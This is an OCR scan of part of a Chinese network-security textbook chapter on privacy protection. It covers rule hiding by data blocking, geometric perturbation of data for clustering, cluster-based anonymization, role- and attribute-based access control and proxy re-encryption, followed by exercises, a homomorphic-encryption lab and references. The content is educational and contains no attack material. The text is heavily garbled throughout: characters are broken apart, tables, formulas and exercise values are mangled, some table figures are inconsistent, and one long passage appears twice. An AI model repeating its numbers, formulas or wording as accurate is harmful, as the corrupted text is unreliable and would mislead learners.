数据 阻塞 法 通过 引入 不 确定 值 (如 ?) 将 特定 规则 的 支持 度 和 置信 度 由 一 个 特定 的 值 转 
换 为 一 个 区 间 , 当 规则 的 支持 度 或 置信 度 落 在 区 间 内 时 ,就 认为 规则 得 到 隐藏 。 具 体 算 法 ， 
基于 降低 规则 的 最 小 支持 度 和 基于 降低 规则 的 最 小 置信 度 。 

如 表 9-11 所 示 , 频繁 项 集 AB 和 AD 的 支持 度 为 60%,A※B 的 置信 和 度 为 75%。 表 9-12 
为 经 过 变换 后 的 数据 集 ,AB 的 支持 度 变 为 0 一 80% ,AD 支持 度 变 为 0 一 60%; A※B 的 置 
信和 度 变 为 0 一 100%。 














表 9-11 阻塞 前 数据 集 表 9-12 阻塞 后 数据 集 
ID B C C ID B © C 
下 0 于 Ts 1 0 1 
T, 1 0 0 T, 1 0 0 
Ts 0 1 1 T 全 b 
下 1 0 0 T, ? 0 0 
Ts 1 0 1 Ts ? 0 1 























数据 阻塞 法 通过 向 原始 数据 库 引 入 不 确定 的 *?” 来 隐藏 数据 库 中 的 敏感 规则 。 通 过 引 
入 不 确定 的 问号 , 原来 规则 的 支持 度 和 置信 度 从 一 个 确定 值 转换 为 不 确定 的 支持 度 区 间 和 
置信 度 区 间 。 若 把 原始 数据 集 用 布尔 矩阵 表示 ,数据 阻塞 法 可 通过 将 敏感 事务 中 的 1 变 成 
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“?” 或 0 变 成 ?来 对 原始 数据 库 进 行 修改 ,使 敏感 规则 的 支持 度 或 置信 和 度 落 入 一 个 不 确定 
性 区 间 ,达到 隐藏 的 目的 。 

为 了 降低 对 原始 数据 的 影响 ,首先 对 生成 敏感 规则 的 记录 中 项 数 最 少 的 记录 进行 阻塞 ， 
这 样 可 以 降低 对 原始 数据 集 的 影响 ; 对 敏感 记录 的 隐藏 是 逐条 进行 的 ; 成 功 地 隐藏 一 项 
后 , 应 重新 计算 规则 的 支持 度 。 

对 频繁 大 项 集 按照 项 数 多 少 和 最 小 支持 度 降序 排列 ,首先 选择 具有 最 大 频繁 项 和 最 小 
支持 度 的 项 进行 修改 。 


9.4.2 聚 类 结果 的 隐私 保护 


与 分 类 结果 的 隐私 保护 类 似 , 保 护 聚 类 的 隐私 敏感 结果 也 是 当前 研究 的 重要 内 容 之 一 。 
Oliveira 等 人 对 发 布 的 数据 采用 平移 、 翻 转 等 几何 变换 的 方法 进行 变换 ,以 保护 聚 类 结果 的 
隐私 内 容 。 此 方法 首先 是 对 原始 数据 进行 几何 变换 ,以 对 敏感 信息 进行 隐藏 ,然后 是 聚 类 过 
程 ,经 过 几何 变换 后 的 数据 可 以 直接 应 用 传统 的 聚 类 算法 进行 聚 类 。 他 们 提出 的 方法 在 聚 
类 准确 度 和 保护 隐私 方面 取得 了 较 好 的 平衡 。 

对 数据 采用 平移 、 翻 转 等 几何 变换 的 原理 同 对 图 像 的 几何 变换 。 

平移 数据 干扰 可 以 看 成 对 原始 数据 添加 了 加 性 噪声 ,这 些 噪声 分 别 被 添加 到 隐私 属性 
的 数值 中 ,噪声 值 是 一 个 常量 ,其 值 可 以 为 正 ,也 可 为 负 。 

平移 数据 干扰 算法 : 

Input: 隐私 属性 集 V ,噪声 集 TN add 

Output: 干扰 后 隐私 属性 集 了 

Stepl: for 每 一 个 隐私 属性 AjEV, 选 择 两 个 隐私 属性 Aj ,Ai +, 为 预先 设 定 值 ; 

选择 一 个 加 性 噪声 项 we € TNadd 

Step2: 将 选择 的 隐私 属性 对 A; ,Ai + :和 加 性 噪声 项 “组 装 成 矩阵 ; 

Step3: 进行 几何 变形 计算 : 

V' < transform(V,TNadd) 

如 对 表 9-13 中 (年 龄 ,收入 ) 进 行 干扰 ,加 性 噪声 参数 取 值 为 (一 3,1 000) ,经 过 几何 变 
形 后 的 结果 如 表 9-14 所 示 。 






































表 9-13 原始 数据 
No 职 业 城 市 年 龄 收 入 
和 学 生 成 都 29 500 
2 经 理 北京 38 7200 
3 教授 上 海 34 5100 
4 律师 深圳 43 6500 
5 牙医 西安 42 8200 
6 护士 广州 48 5300 
表 9-14 平移 干扰 后 的 数据 

No 职 业 年 龄 收 入 

学 生 26 1500 

2 经 理 35 8200 
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“?” 或 0 变 成 ?来 对 原始 数据 库 进 行 修改 ,使 敏感 规则 的 支持 度 或 置信 和 度 落 入 一 个 不 确定 
性 区 间 ,达到 隐藏 的 目的 。 

为 了 降低 对 原始 数据 的 影响 ,首先 对 生成 敏感 规则 的 记录 中 项 数 最 少 的 记录 进行 阻塞 ， 
这 样 可 以 降低 对 原始 数据 集 的 影响 ; 对 敏感 记录 的 隐藏 是 逐条 进行 的 ; 成 功 地 隐藏 一 项 
后 , 应 重新 计算 规则 的 支持 度 。 

对 频繁 大 项 集 按照 项 数 多 少 和 最 小 支持 度 降序 排列 ,首先 选择 具有 最 大 频繁 项 和 最 小 
支持 度 的 项 进行 修改 。 


9.4.2 聚 类 结果 的 隐私 保护 


与 分 类 结果 的 隐私 保护 类 似 , 保 护 聚 类 的 隐私 敏感 结果 也 是 当前 研究 的 重要 内 容 之 一 。 
Oliveira 等 人 对 发 布 的 数据 采用 平移 、 翻 转 等 几何 变换 的 方法 进行 变换 ,以 保护 聚 类 结果 的 
隐私 内 容 。 此 方法 首先 是 对 原始 数据 进行 几何 变换 ,以 对 敏感 信息 进行 隐藏 ,然后 是 聚 类 过 
程 ,经 过 几何 变换 后 的 数据 可 以 直接 应 用 传统 的 聚 类 算法 进行 聚 类 。 他 们 提出 的 方法 在 聚 
类 准确 度 和 保护 隐私 方面 取得 了 较 好 的 平衡 。 

对 数据 采用 平移 、 翻 转 等 几何 变换 的 原理 同 对 图 像 的 几何 变换 。 

平移 数据 干扰 可 以 看 成 对 原始 数据 添加 了 加 性 噪声 ,这 些 噪声 分 别 被 添加 到 隐私 属性 
的 数值 中 ,噪声 值 是 一 个 常量 ,其 值 可 以 为 正 ,也 可 为 负 。 

平移 数据 干扰 算法 : 

Input: 隐私 属性 集 V ,噪声 集 TN add 

Output: 干扰 后 隐私 属性 集 了 

Stepl: for 每 一 个 隐私 属性 AjEV, 选 择 两 个 隐私 属性 Aj ,Ai +, 为 预先 设 定 值 ; 

选择 一 个 加 性 噪声 项 we € TNadd 

Step2: 将 选择 的 隐私 属性 对 A; ,Ai + :和 加 性 噪声 项 “组 装 成 矩阵 ; 

Step3: 进行 几何 变形 计算 : 

V' < transform(V,TNadd) 

如 对 表 9-13 中 (年 龄 ,收入 ) 进 行 干扰 ,加 性 噪声 参数 取 值 为 (一 3,1 000) ,经 过 几何 变 
形 后 的 结果 如 表 9-14 所 示 。 






































表 9-13 原始 数据 
No 职 业 城 市 年 龄 收 入 
和 学 生 成 都 29 500 
2 经 理 北京 38 7200 
3 教授 上 海 34 5100 
4 律师 深圳 43 6500 
5 牙医 西安 42 8200 
6 护士 广州 48 5300 
表 9-14 平移 干扰 后 的 数据 

No 职 业 年 龄 收 入 

学 生 26 1500 

2 经 理 35 8200 
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续 表 
No 职 业 年 龄 收 入 
3 教授 31 6100 
4 律师 40 7500 
5 牙医 39 9200 
6 护士 45 6300 





缩放 数据 干扰 可 以 看 成 对 原始 数据 添加 了 乘 性 噪声 ,该 噪声 是 一 个 预先 设 定 的 常量 ,其 
值 可 以 为 正 ,也 可 以 为 负 。 该 干扰 算法 与 平移 数据 干扰 算法 类 似 , 只 是 在 计算 时 将 加 法 操作 
变 成 乘法 操作 。 此 处 仍 以 表 9-13 数据 为 例 , 选 择 年 龄 和 收入 进行 干扰 , 乘 性 噪声 参数 取 值 
为 (0.8,1. 1) ,计算 结果 如 表 9-15 所 示 。 


表 9-15 缩放 干扰 后 的 数据 





























No 职 业 年 龄 收 入 
1 学 生 23 550 

2 经 理 30 7920 

3 教授 27 5610 

4 律师 34 7150 

5 牙医 34 9020 

6 护士 38 5830 


类 似 地 ,旋转 干扰 可 以 看 成 是 一 个 特殊 的 乘 性 噪声 ,只 是 其 噪声 参数 是 一 个 角度 值 0， 
该 9 值 可 正 可 负 。 以 表 9-13 数据 为 例 ,此 处 旋转 噪声 参数 为 〈cos30 ,sin30) ,计算 结果 如 
表 9-16 所 示 。 


表 9-16 旋转 干扰 后 的 数据 

















No 职 业 年 龄 收 入 
1 学 生 23 250 

2 经 理 30 3600 

3 教授 27 2550 

4 律师 34 3250 
牙医 34 4100 

6 护士 38 2650 














从 上 面 的 计算 结果 可 以 看 出 ,每 个 不 同 数据 扰乱 方法 的 结果 都 不 一 样 ,但 都 能 达到 影响 
数据 挖掘 聚 类 算法 的 目的 ,使 算法 得 到 错误 的 分 析 结果 ,从 而 达到 了 隐私 保护 的 目的 。 

根据 经 验 来 看 ,对 于 隐私 度 较 低 的 属性 值 可 以 使 用 单一 的 干扰 算法 ,如 平移 、 旋 转 或 缩 
放 。 而 对 于 隐私 度 较 高 的 属性 可 以 使 用 干扰 力度 较 大 的 混合 算法 ,如 欧式 变换 、 相 似 变 化 或 
仿 射 变换 。 当 然 也 可 以 自由 组 合 平移 \ 缩 放 和 旋转 进行 数据 扰乱 。 

几何 变形 数据 干扰 方法 主要 是 影响 聚 类 算法 的 效果 ,因此 ,采用 经 典 的 -Means 对 几 
种 几何 变形 算法 进行 测试 。 评 价 数据 采用 KDD CUP 99 数据 库 的 结构 化 数据 进行 测试 。 

评价 方法 : 通过 对 原始 数据 和 干扰 后 的 数据 分 别 进行 聚 类 ,对 结果 中 的 每 个 聚 类 集中 
数据 点 的 个 数 进行 比较 ,其 差 值 即 表示 对 数据 进行 了 干扰 , 差 值 的 大 小 也 可 以 在 一 定 程度 上 


第 9 章 隐私 保护 


331 





说 明 干 扰 程 度 。 其 计算 公式 如 下 : 巨 一 韦 X (| Cluster(D) | 一 | ClusterCD) 1) 
公式 中 ,N 表示 数据 库 中 数据 点 个 数 ,& 是 聚 类 产生 的 数据 集 个 数 ,| Cluster;(D) | 表 


示 数 据 集中 数据 点 个 数 。 采 用 & -Means 比较 后 的 结果 如 表 9-17 所 示 。 


表 9-17 k-Means 比较 结果 

















Kk-Means 
方 法 
k=3 k=4 k=5 
平移 0.00 0.06 0.06 
缩放 0.02 0.04 0.07 
旋转 0.09 0.09 0.13 
相似 0.06 0.08 0.10 











通过 表 9-17 中 的 结果 可 以 看 出 ,每 个 方法 在 不 同 k 值 下 的 差 值 不 同 ,说 明了 这 些 方法 
在 干扰 上 存在 差异 ,其 中 ,旋转 干扰 的 差异 最 大 ,相似 干扰 略 低 于 它 。 从 差 值 上 看 ,旋转 干扰 
的 干扰 力度 应 该 最 大 。 

对 于 聚 类 算法 来 说 , 异 值 点 对 聚 类 结果 影响 很 大 ,甚至 会 导致 聚 类 失败 。 因 此 ,对 几 种 
几何 变形 方法 产生 的 异 值 点 也 进行 了 评价 ,结果 如 表 9-18 所 示 。 


表 9-18 Kk-Means 异 值 点 

















k-Means 
方 法 
k=3 k=4 k=5 
平移 0 0 
缩放 0 
旋转 0 
相似 10 F 20 











从 表 9-18 中 可 以 看 出 ,相似 干扰 出 现 的 异 值 点 数量 最 多 , 异 值 点 不 仅 会 使 聚 类 算法 计 
算 时 间 增 长 ,也 会 导致 聚 类 的 效果 下 降 。 因 此 ,从 综合 结果 来 看 ,相似 干扰 在 评价 的 几 种 方 
法 中 对 聚 类 算法 的 影响 最 大 ,隐私 保护 程度 最 高 。 

基于 聚 类 的 匿名 化 算法 

基于 聚 类 的 匿名 化 算法 将 原始 记录 映射 到 特定 的 度量 空间 中 ,再 对 空间 中 的 点 进行 聚 
类 来 实现 数据 匿名 。 类 似 于 &- 匿 名 ,算法 保证 每 个 聚 类 中 至 少 有 上 个 数据 点 。 

根据 度量 的 不 同 有 一 gather 和 r-cellular 这 两 种 聚 类 算法 。 以 r-gather 算法 为 例 , 它 以 
所 有 聚 类 中 的 最 大 半径 为 度量 ,需要 达到 的 目标 是 : 对 所 有 数据 点 进行 聚 类 ,在 保证 每 个 聚 
类 至 少 包含 个 数据 点 的 同时 ,也 使 所 有 聚 类 中 的 最 大 半径 越 小 越 好 。 表 9-20 是 采用 2- 
gather 算法 对 表 9-19 原始 数据 聚 类 后 发 布 的 结果 。 由 于 发 布 的 结果 只 包含 聚 类 中 心 .半径 以 
及 相关 的 敏感 属性 值 , 同 一 个 等 价 类 中 的 记录 不 可 区 分 ,因此 对 个 人 的 敏感 信息 实现 了 隐藏 。 

上 述 匿 名 策略 都 会 造成 较 大 信息 损失 。 在 进行 数据 使 用 时 ,这 些 信息 损失 有 可 能 使 得 
数据 使 用 者 做 出 误 判 。 

不 同 的 用 户 对 于 自身 的 隐私 信息 有 着 不 同 程度 的 保护 要 求 。 使 用 统一 的 匿名 标准 显然 
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会 造成 不 必要 的 信息 损失 ,因此 个 性 化 匿名 技术 应 运 而 生 , 即 可 根据 用 户 的 要 求 对 发 布 数据 
中 的 敏感 属性 值 提供 不 同 程度 的 隐私 保护 。 各 级 匿名 标准 提供 的 匿名 效果 不 同 ,相应 的 信 
息 损失 也 不 同 。 以 此 避免 了 不 必要 的 信息 损失 ,从 而 显著 提高 发 布 数据 的 可 用 性 。 




















表 9-19 原始 数据 
年 龄 地 址 疾 病 
a b 胃炎 
a 十 2 b 消化 不 良 
w 二 十 3 感冒 
[4 d 肺炎 
4 = 感冒 








表 9-20 聚 类 后 的 数据 








年 龄 地 址 记 录 数 疾 病 
胃炎 

a 十 1 b 2 消化 不 良 
感冒 
3 d 3 和 











9.5 数据 访问 控制 技术 


数据 访问 控制 技术 主要 用 于 决定 哪些 用 户 以 何 种 权限 访问 哪些 数据 资源 ,从 而 确保 合 
适 的 数据 及 合适 的 属性 在 合适 的 时 间 和 地 点 ,给 合适 的 用 户 访问 ,其 主要 目标 是 解决 数据 使 
用 过 程 中 的 隐私 保护 问题 。 

传统 访问 控制 方式 包括 自主 访问 控制 (Discretionary Access Control,DAC) 和 强制 访 
问 控制 (Mandatory Access Control,MAC) ,特点 是 面向 封闭 环境 ,访问 控制 的 粒度 都 比较 
粗 ,难以 满足 开放 式 环境 下 对 访问 控制 的 精细 化 要 求 。 

现代 访问 控制 技术 主要 包括 基于 角色 的 访问 控制 和 基于 属性 的 访问 控制 方法 。 


9.5.1 基于 角色 的 访问 控制 


基于 角色 的 访问 控制 (Role-based Access Control,RBAC) 中 ,不 同 角 色 的 访问 控制 权 
限 不 尽 相 同 。 通 过 为 用 户 分 配角 色 ,可 实现 对 数据 的 访问 权限 控制 。 由 此 ,在 基于 角色 的 访 
问 控制 中 ,角色 挖掘 是 前 提 。 通 常 角色 是 根据 工作 能 力 、 职 权 及 责任 确定 的 。 

RABC 把 隐私 数据 分 为 绝对 隐私 数据 和 角色 隐私 数据 两 类 。 

。 绝 对 隐私 数据 : 指 一 些 极度 重要 的 数据 信息 ,如 身份 证 号 码 、 信 用 卡 账号 密码 、 社 会 

保障 卡 账号 密码 、 存 折 账 号 密码 、 户 籍 信息 等 , 即 关系 到 人 身 财产 安全 的 数据 ,这 类 数 
据 具 有 隐私 保护 的 最 高 级 别 。 
。 角色 隐私 数据 : 用 户 在 某 个 场景 中 扮演 某 种 社会 角色 ,在 该 场景 中 需要 访问 的 隐私 
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数据 就 是 这 个 场景 下 的 角色 隐私 数据 。 
基于 场景 的 隐私 保护 流程 如 图 9-2 所 示 。 





设置 绝对 隐私 数据 








设置 场景 模式 








一 一 一 一 | 使 用 匿名 ID 代 替 











用 户 输入 口令 访问 


切换 场景 模式 人 

















清除 历史 记录 














图 9-2 基于 场景 的 隐私 保护 流程 


(1) 用 户 将 用 户 终端 中 存放 的 绝对 隐私 数据 转移 到 该 用 户 终 端的 一 个 秘密 分 区 中 , 采 
用 某 种 加 密 算法 对 其 进行 加 密 隐藏 ,使 得 用 户 终端 在 正常 工作 时 ,不 会 显示 这 些 重要 数据 的 
存在 ; 同时 ,为 每 一 个 绝对 隐私 数据 开启 访问 监控 ,一 旦 这 些 数 据 唱 到 访问 ,就 立即 向 用 户 
发 出 报告 ,用 户 判 断 是 否 为 合法 访问 后 ,进行 相应 的 阻止 和 允许 操作 。 

(2) 用 户 针 对 生活 中 经 常 需要 到 达 的 场景 ,分 别 为 每 个 场景 设置 隐私 保护 模式 ,列举 该 
应 用 场景 中 可 能 被 访问 到 的 角色 隐私 数据 ,针对 这 些 数据 逐个 设置 隐私 保护 级 别 。 

。 一 级 : 对 场景 中 可 信任 方 公开 ; 

。 二 级 : 仅 对 用 户 本 人 公开 ,获得 用 户 本 人 权限 后 可 直接 访问 到 隐私 数据 ; 

。 三 级 : 用 户 需要 秘密 分 区 口令 才 可 访问 ,获得 用 户 本 人 权限 后 还 需要 知道 打开 用 户 

终端 秘密 分 区 的 口令 才能 访问 到 绝对 隐私 数据 。 

(3) 进入 某 个 场景 之 后 ,由 场景 提供 一 个 匿名 ID 给 用 户 , 将 在 该 场景 中 的 公共 数据 与 
这 个 匿名 ID 关联 起 来 。 用 户 使 用 该 ID 可 访问 公共 数据 ,但 不 能 访问 隐私 数据 ,只 有 获得 进 
一 步 授权 才能 访问 不 同 级 别 的 隐私 数据 ,从 而 实现 隐私 数据 和 公共 数据 的 访问 控制 分 离 。 

(4) 在 某 个 场景 中 需要 访问 用 户 的 三 级 隐私 数据 (绝对 隐私 数据 ) 时 ,因为 该 场景 中 可 
信任 方 没有 访问 权限 ,只 能 够 提出 访问 请 求 等 待 用 户 输入 确认 口令 ,才能 够 完成 对 绝对 隐私 
数据 的 访问 或 者 修改 。 

(5) 当 实 际 场景 发 生 转换 时 ,用 户 需 要 对 已 使 用 场景 模式 下 产生 的 历史 隐私 记录 进行 
清理 ,以 防止 这 些 历史 记录 被 追踪 ,然后 再 转换 到 下 一 个 场景 模式 ,这 样 各 个 场景 模式 之 间 
不 会 造成 隐私 访问 记录 的 泄露 。 


9.5.2 基于 属性 的 访问 控制 


基于 属性 的 访问 控制 (Attribute Based Access Control, ABAC) 通 过 将 各 类 属性 ,包括 
用 户 属性 、 资 源 属性 、 环 境 属性 等 组 合 起 来 用 于 用 户 访 问 权限 的 设 定 。 

RBAC 以 用 户 为 中 心 , 而 没有 将 额外 的 资源 信息 ,如 用 户 和 资源 之 间 的 关系 、 资 源 随 时 
间 的 动态 变化 .用户 对 资源 的 请 求 动作 (如 浏览 ,编辑 、 删 除 等 ) 以 及 环境 上 下 文 信息 进行 综 
合 考 虑 。 而 基于 属性 的 访问 控制 ABAC 通过 对 全 方位 属性 的 考虑 ,可 以 实现 更 加 细 粒 度 的 
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访问 控制 。 

基于 属性 的 加 密 (Attribute Based Encryption,ABE) 将 属性 与 密 文 和 用 户 私 钥 关联 ,能 
够 灵活 地 表示 访问 控制 策略 。 但 对 于 存储 在 云端 的 大 数据 , 当 数 据 拥 有 者 想 要 改变 访问 控 
制 策 略 时 ,需要 先 将 加 密 数据 从 云端 取 回 本 地 ,解密 原 有 数据 ,之 后 再 使 用 新 的 策略 重新 加 
密 数 据 ,最 后 将 密 文 传 回 云 端 。 在 这 一 过 程 中 , 密 文 需要 来 回 传输 ,会 消耗 大 量 带 宽 ,从 而 引 
发 异常 ,引起 攻击 者 的 注意 。 同 时 对 数据 解密 和 重新 加 密 也 会 使 得 计算 复杂 度 显著 增 大 。 

云端 代理 重 加 密 

云端 代理 重 加 密 将 基于 属性 的 加 密 与 代理 重 加 密 技术 结合 ,实现 云 中 的 安全 、 细 粒度 、 
可 扩展 的 数据 访问 控制 。 新 的 用 户 获取 授权 或 原 有 用 户 释 放 授权 时 的 重 加 密 工 作 由 云端 
代理 ,减轻 数据 拥有 者 的 负担 。 同 时 对 数据 拥有 者 来 说 ,云端 可 能 并 非 是 完全 可 信 的 ,在 利 
用 云端 进行 代理 重 加 密 的 同时 还 应 防止 数据 被 云端 宇 探 。 

用 户 提交 给 云 的 是 密 文 ,云端 无 法 解密 ,云端 利用 重 加 密 算法 转换 为 另 一 密 文 ,新 的 密 
文 只 能 被 授权 用 户 解 密 , 而 在 整个 过 程 中 云端 服务 器 看 到 的 始终 是 密 文 ,看 不 到 明文 。 云 中 
用 户 频 繁 地 获取 和 释放 授权 ,使 得 数据 密 文 重 加 密 工作 繁重 ,由 云端 代理 重 加 密 工 作 , 可 以 
大 大 减轻 数据 拥有 者 的 负担 。 同 时 ,云端 无 法 解密 密 文 ,也 就 无 法 窥探 数据 内 容 。 

随 着 计算 能 力 的 进一步 提升 ,无 论 是 基于 角色 的 访问 控制 还 是 基于 属性 的 访问 控制 , 访 
问 控制 的 效率 将 得 到 快速 提升 。 同 时 ,更 多 的 数据 将 被 收集 起 来 用 于 角色 挖掘 或 者 属性 识 
别 ,从 而 可 以 实现 更 加 精准 、 更 加 个 性 化 的 访问 控制 。 总 体 而 言 ,未 来 将 角色 与 属性 相 结 合 
的 细 粒 度 权限 分 配 将 会 有 很 大 的 发 展 。 


习 题 9 
9.1 隐私 概述 
1. 隐私 数据 的 保护 效果 是 通过 攻击 者 ( ) 的 多 窒 来 侧面 反映 的 。 
2 ) 表 示 经 过 隐私 保护 技术 处 理 之 后 原始 数据 的 信息 丢失 量 ,是 针对 ( ) 质 量 
的 一 种 度量 方法 。 
3. 最 早 提出 的 解决 位 置 隐私 保护 问题 的 方法 是 ( ) ,其 主要 思想 是 ( Ns 
4. 隐私 保护 需求 包括 ( 。”)、( ) 和 ( ja 


5. 为 了 解决 数据 访问 和 使 用 时 的 隐私 泄露 问题 ,现在 的 技术 主要 包括 哪些 ? 

9.2 数据 发 布 隐私 保护 技术 

1. 数据 发 布 隐私 保护 技术 主要 作用 有 哪些 ? 

2. 数据 匿名 化 所 处 理 的 原 数据 表 中 数据 包含 的 属性 值 包括 哪 几 类 ? 

3. 最 常用 的 匿名 技术 是 ( ) 和 ( 3 

9.3 数据 存储 隐私 保护 技术 

1. 什么 是 同 态 加 密 ? 什么 是 全 同 态 加密 ? 

2. RSA 密码 具有 乘法 同 态 性 ,应 用 该 性 质 可 在 保护 云 存储 数据 安全 的 条 件 下 实现 云 
计算 。 具 体例 子 为 : 

(1) Alice 生成 一 对 RSA 公私 密 钥 ,使 用 公 钥 加 密 长 方 体 的 长 /\ 宽 志高 hh 生成 E(1， 
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AS) 下 (mw,RA) 下 (人 ) 发 送 给 Cloud, 自 己 保存 私 钥 ; 

(2) Cloud 计算 体积 V==E(1,ka)XE(w,ka)XE(h,ka), 返 回 结 果 V 给 Alice。 该 过 
程 中 Cloud 并 不 知道 1、w、h、V 的 真实 具体 值 (明文 ) ,实现 了 数据 存储 安全 ; 

数据 存储 安全 的 含义 是 在 计算 机 或 者 其 他 服务 器 上 存储 的 加 密 数据 ,在 没有 用 户 密 钥 
的 条 件 下 ,不 可 能 从 加 密 结果 中 得 到 有 关 原 始 数 据 的 任何 信息 。 只 有 拥有 密 钥 的 用 户 才能 
够 正确 解密 ,得 到 原始 的 内 容 。 

(3) Alice 使 用 私 钥 解密 D(V ,ks ) 得 到 运算 结果 。 

请 回答 以 下 问题 : 

(1) 已 知 RSA 算法 生成 的 一 对 密 钥 : As 一 (3,33) ,hk 二 (7,33)。 设 1 二 2,w 二 3,h 二 4， 
求 E(L,ka) E(w,ka)、E(h,ka)、V、D(V ,kg) 的 具体 值 。D(V ,ku) 二 1XwXh 是 否 成 立 ? 

(2) Alice 使 用 这 种 云 计算 方法 的 优点 是 什么 ? 可 能 会 存在 什么 问题 ? 应 用 场景 是 
什么 ? 

3. RSA 密码 具有 ( ) 同 态 性 , 凯 撤 密 码 对 字符 串 连接 运算 (加 运算 ) 具 有 加 法 ( ) 同 

9.4 数据 挖掘 隐私 保护 技术 

1. 关联 规则 的 隐私 保护 主要 有 哪 两 类 方法 ? 

2. 简 述 3 种 主要 的 隐藏 关联 规则 策略 。 

3. 基于 聚 类 的 匿名 化 算法 将 原始 记录 映射 到 特定 的 ( ) ,再 对 空间 中 的 点 进行 
( ) 来 实现 数据 匿名 。 

9.5 数据 访问 控制 技术 

1. 基于 角色 的 访问 控制 中 ,不 同 角色 的 ( ) 权 限 不 尽 相同 。 

2. RABC 把 隐私 数据 分 为 ( ) 和 ( ) 两 类 。 

3. 云端 代理 重 加 密 将 ( ) 与 ( ) 结 合 ,实现 云 中 的 安全 、 细 粒度 .可 扩展 的 数据 
访问 控制 。 

4. 简 述 基于 场景 的 灵活 隐私 保护 流程 。 


实验 8 基于 同 态 加 密 的 图 像 编 辑 


【实验 目的 】 


实现 同 态 加 密 图 像 密 文 编辑 系统 ,在 不 解密 的 情况 下 对 图 像 进 行 编辑 ,而 且 对 编辑 后 的 
密 文 图 像 解 密 , 验 证 效果 等 效 于 直接 编辑 明文 图 像 。 


【实验 内 容 】 


(1) 学 习 开 源 软件 包 HELib 的 使 用 方法 ,实现 同 态 加 密 。 

(2) 实现 图 像 的 同 态 加 密 和 解密 ,效果 如 图 9-3 所 示 。 

(3) 实现 图 像 在 密 文 状态 下 90" 正 整数 倍 旋转 ,效果 如 图 9-4(a) 所 示 , 然 后 将 旋转 后 图 像 
解密 ,效果 如 图 9-4(b) 所 示 。 验 证 同 态 加 密 对 密 文 图 像 的 编辑 等 效 于 对 明文 图 像 的 编辑 。 

(4) 实现 图 像 在 密 文 状 态 下 水 平 翻转 (镜像 ) ,效果 如 图 9-5(a) 所 示 ; 然后 将 翻转 后 图 
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(a) 原 图 (b) 加 密 图 
图 9-3 图 像 同 态 加 密 与 解密 









(a) 加 密 图 270? 旋 转 (b) 270° 旋 转 解密 图 
图 9-4 加 密 图 270" 旋 转 


像 解 密 , 效 果 如 图 9-5(b) 所 示 。 验 证 同 态 加 密 对 密 文 图 像 的 编辑 等 效 于 对 明文 图 像 的 
编辑 。 


和 3 

六 

六 -了 

(加密 图 水 平 翻转 (b) 水 平 翻转 解 窗 图 
图 9-5 加 密 图 水 平 翻转 


(5) 自己 选择 一 种 图 像 操 作 ,验证 同 态 加 密 对 密 文 图 像 的 编辑 等 效 于 对 明文 图 像 的 编 
辑 。 要 求 有 实验 截图 和 说 明 。 











[21] 





参考 文献 


方 滨 兴 , 贾 焰 , 李 爱 平 ,等 .大 数据 隐私 保护 技术 综述 [站 ,大 数据 , 2016, 2(1): 1-18. 

吴 礼 发 , 洪 征 , 李 华 波 . 网 络 攻防 原理 与 技术 [MJ]. 2 版 . 北京 : 机 械 工 业 出 版 社 ,2016. 

结 城 浩 . 图 解密 码 技术 LM]. 3 版 . 北京 : 人 民 邮 电 出 版 社 ,2016. 

李 启 南 , 武 茂生 , 牛 泽 杰 . 基于 抗 合 谋 指 纹 的 数字 档案 信息 安全 保护 [J]. 档案 学 研究 ,2016,3， 
78-81. 

吴 辰 文 , 朱 建 东 , 辣 光辉 ,等 有 品 网 络 断 层 扫描 方法 研究 [J]. 计算 机 应 用 与 软件 ,2016, 33(8): 
150-152. 

牛 泽 杰 , 李 启 南 ,李强 军 . 基于 和 矩形 树 图 和 折线 图 的 网 络 流量 分 析 []]. 兰州 交通 大 学 学 报 ,2016,35 
(6): 51-56. 

Anusha Bilakanti, Anjana N B, Divya A, et al. Secure Computation over Cloud using Fully 
Homomorphic Encryption[C]. //2nd International Conference on Applied and Theoretical Computing 
and Communication Technology (iCATccT) ,IEEE 2016: 633-636. 
李 启 南 , 董 一 君 , 李 娇 ,等 . 基于 CFF 码 和 I 码 的 抗 合 谋 数 字 指纹 编码 [J]. 计算 机 工程 ,2015,41(6): 
110-115. 
杨 攀 , 桂 小 林 , 姚 婧 ,等 . 支持 同 态 算术 运算 的 数据 加 密 方案 算法 研究 [J]. 通信 学 报 . 2015,36(1)， 
167-168. 

威廉 。 斯 托 林 斯 ,密码 编码 学 与 网 络 安全 一 一 原理 与 实践 [MJ. 6 版 . 唐 明 , 译 . 北京 : 电子 工业 出 
版 社 ,2015. 

Bertino E. Big Data 一 Security and Privacy[C]. //IEEE International Congress on Big Data. IEEE 
Computer Society, 2015: 757-761. 

冯 登 国 , 张 敏 , 李 昊 . 大 数据 安全 与 隐私 保护 []]. 计算机 学 报 ,2014,37(01): 246-258. 

赵 颖 , 攀 晓 平 , 周 芳 芳 ,等 . 网 络 安全 数据 可 视 化 综述 [J]. 计算 机 辅助 设计 与 图 形 学 学 报 ，2014,26 
(5): 687-697. 

付 艳 艳 , 张 敏 , 冯 登 国 ,等 . 基于 节点 分 割 的 社交 网 络 属性 隐私 保护 [J]]. 软件 学 报 ,2014,25(4) : 
768-780. 

Sun W, Yu S,Lou W,et al. Protecting your right: Attribute-based keyword search with fine-grained 
owner-enforced search authorization in the cloudLC]. //IEEE INFOCOM. IEEE, 2014: 226-234. 
Liu P, Li X. An Improved Privacy Preserving Algorithm for Publishing Social Network Data[ C]. // 
IEEE, International Conference on High PERFORMANCE Computing and Communications & 2013 
IEEE International Conference on Embedded and Ubiquitous Computing. IEEE, 2014: 888-895. 
谢 建 全 , 黄 大 足 , 谢 访 . 基于 RSA 公 钥 体制 的 非 对 称 数 字 指 纹 协 议 [J]. 小 型 微型 计算 机 系统 ， 
2013 ,34(11): 2542-2545. 

李 启 南 , 李 娇 , 武 让 . 基于 双重 零 水 印 的 数据 库 版 权 保护 [J]. 计算 机 工程 ,2012,38(8) : 107-110. 
Skarkala M E, Maragoudakis M, Gritzalis S，et al. Privacy preservation by k-anonymization of 
weighted social networks [Cl]. //IEEE/ACM International Conference on Advances in Social 
Networks Analysis and Mining， 2012: 423-428. 

张 玲 , 李 乔 良 , 胡 德 发 . 一 种 扩展 的 抗 合谋 数字 指纹 方案 [J]. 计算 机 工程 与 应 用 ,2012,48(1): 
128-131. 

程 格 平 , 囊 硕 , 魏 希 三 . 基于 量化 索引 调制 的 抗 共 谋 指 纹 改进 方案 [J]. 计算 机 工程 ,2012, 38 (12): 


338 网 络 安 全 教程 与 实践 (第 2 版 ) 





102-104. 

